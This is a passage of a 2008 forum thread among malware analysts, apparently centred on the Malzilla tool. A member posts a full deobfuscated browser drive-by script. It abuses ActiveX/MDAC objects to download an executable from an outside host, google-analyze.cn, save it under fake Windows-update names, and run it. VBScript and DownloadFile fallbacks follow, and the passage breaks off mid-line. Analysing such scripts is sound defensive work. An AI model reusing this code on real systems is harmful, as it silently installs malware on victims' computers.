Same here :( (confirmed on XP SP2 and SP3)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

September 02, 2008, 04:04:47 am
Reply #189

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
Which option you use for eval() (replace, override, leave as is)?
It works fine for me here with "leave as is".
Do you have enough free space on partition, as this script require a lot of free space (>100mb)?
Is the "eval_temp" folder present in Malzilla's folder?

September 02, 2008, 04:05:56 am
Reply #190

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
Here is the script after deobfuscation:
Code: [Select]
var url='http://google-analyze.cn/getexe.exe?o=2&t=1220309190&i=1365934880&e=';
var success=0;
var exeurl=url+'1';
function CreateO(o,n){
var r=null;
try{r=o.CreateObject(n)}catch(e){}
if(!r){try{r=o.CreateObject(n,"")}catch(e){}}
if(!r){try{r=o.CreateObject(n,"","")}catch(e){}}
if(!r){try{r=o.GetObject("",n)}catch(e){}}
if(!r){try{r=o.GetObject(n,"")}catch(e){}}
if(!r){try{r=o.GetObject(n)}catch(e){}}
return(r);
}
var repl=new Array("-","ip","il","te","je","el","ca","ec","ol","os","LH","SX","ve","DO","re","od","pe","it","cl");
function Go(a){
var fso=a.CreateObject("Scr"+repl[1]+"ting.F"+repl[2]+"eSys"+repl[3]+"mOb"+repl[4]+"ct","")
var sap=CreateO(a,"Sh"+repl[5]+"l.Appli"+repl[6]+"tion");
var nl=null;
fname="KB908845.exe";
fname=eval("fso.Bu"+repl[2]+"dPath(fso.GetSp"+repl[7]+"ialF"+repl[8]+"der(2),fname)");
try{nl=CreateO(a,"Micr"+repl[9]+"oft.XM"+repl[10]+"TTP");nl.open("GET",exeurl,false);}
catch(e){try{nl=CreateO(a,"M"+repl[11]+"ML2.XM"+repl[10]+"TTP");nl.open("GET",exeurl,false);}
catch(e){try{nl=CreateO(a,"M"+repl[11]+"ML2.Ser"+repl[12]+"rXM"+repl[10]+"TTP");nl.open("GET",exeurl,false);}
catch(e){try{nl=new XMLHttpRequest();nl.open("GET",exeurl,false);}
catch(e){return 0;}}}}
nl.send(null);
rb=nl.responseBody;
var x=CreateO(a,"A"+repl[13]+"DB.St"+repl[14]+"am");
x.Type=1;
eval("x.M"+repl[15]+"e=3;x.O"+repl[16]+"n();x.Wr"+repl[17]+"e(rb);x.Sa"+repl[12]+"Tof"+repl[2]+"e(fname,2);sap.Sh"+repl[5]+"lEx"+repl[7]+"ute(fname);");
return 1;
}
function mdac(){
var i=0;
var target=new Array("BD96C556"+repl[0]+"65A3-11D0-983A-00C04FC29E36","AB9BCEDD"+repl[0]+"EC7E-47E1-9322-D4A210617116","0006F033"+repl[0]+"0000-0000-C000-000000000046","0006F03A"+repl[0]+"0000-0000-C000-000000000046","6e32070a"+repl[0]+"766d-4ee6-879c-dc1fa91d2fc3","6414512B"+repl[0]+"B978-451D-A0D8-FCFDF33E833C","7F5B7F63"+repl[0]+"F06F-4331-8A26-339E03C0AE3D","06723E09"+repl[0]+"F4C2-43c8-8358-09FCD1DB0766","639F725F"+repl[0]+"1B2D-4831-A9FD-874847682010","BA018599"+repl[0]+"1DB3-44f9-83B4-461454C84BF8","D0C07D56"+repl[0]+"7C69-43F1-B4A0-25F5A11FAB19","E8CCCDDF"+repl[0]+"CA28-496b-B050-6C07C962476B",null);
while(target[i]){
var a=null;
a=document.createElement("object");
a.setAttribute(repl[18]+"assid",repl[18]+"sid:"+target[i]);
if(a){try{var b=CreateO(a,"Sh"+repl[5]+"l.Appli"+repl[6]+"tion");if(b){if(Go(a))return 1;}}catch(e){}}
i++;
}
}
if(mdac()) success=1;
if(!success){
document.write("<script language=VBScript>\r\n"+
'Set elem=document.createElement("ob'+repl[4]+'ct")'+"\r\n"+
'fname="KB908518.exe"'+"\r\n"+
'elem.setAttribute "id","elem"'+"\r\n"+
'elem.setAttribute "'+repl[18]+'assid","'+repl[18]+'sid:BD96C556'+repl[0]+'65A3-11D0-983A-00C04FC29E36"'+"\r\n"+
'Set obj=elem.CreateObject("Sh'+repl[5]+'l.Appli'+repl[6]+'tion","")'+"\r\n"+
"Set nsp=obj.NameSpace(20)\r\n"+
'Set pnm=nsp.ParseName("Symbol.ttf")'+"\r\n"+
'tmp=Split(pnm.Path,"\\",-1,1)'+"\r\n"+
'path=tmp(0) & "\\" &  tmp(1) & "\\"'+"\r\n"+
"fname=path & fname\r\n"+
'set tpqpd=CreateObject("Micr'+repl[9]+'oft.XM'+repl[10]+'TTP")'+"\r\n"+
'iiqu=tpqpd.Open("GET",exeurl,0)'+"\r\n"+
"tpqpd.Send()\r\n"+
"On Error Resume Next\r\n"+
"egsyho=tpqpd.responseBody\r\n"+
'Set acvqqrp=elem.CreateObject("Scr'+repl[1]+'ting.F'+repl[2]+'eSys'+repl[3]+'mOb'+repl[4]+'ct","")'+"\r\n"+
"Set kld=acvqqrp.CreateTextFile(fname, TRUE)\r\n"+
"lotzom=LenB(egsyho)\r\n"+
"For j=1 To lotzom\r\n"+
"plkosl=MidB(egsyho,j,1)\r\n"+
"qamplxd=AscB(plkosl)\r\n"+
"kld.Write(Chr(qamplxd))\r\n"+
"Next\r\n"+
"kld.Close\r\n"+
'Set yipt=elem.CreateObject("WScr'+repl[1]+'t.Sh'+repl[5]+'l","")'+"\r\n"+
"On Error Resume Next\r\n"+
"yipt.R"+repl[19]+" fname,1,FALSE\r\n"+
'<\/script>');
}

if(!success){
exeurl=url+'9';
document.write('<object classid="clsid:59DBDDA6-9A80-42A4-B824-9BC50CC172F5" id="test"></object>');
try{test.DownloadFile(exeurl,"..\\~tmp0001.exe","0","0");document.location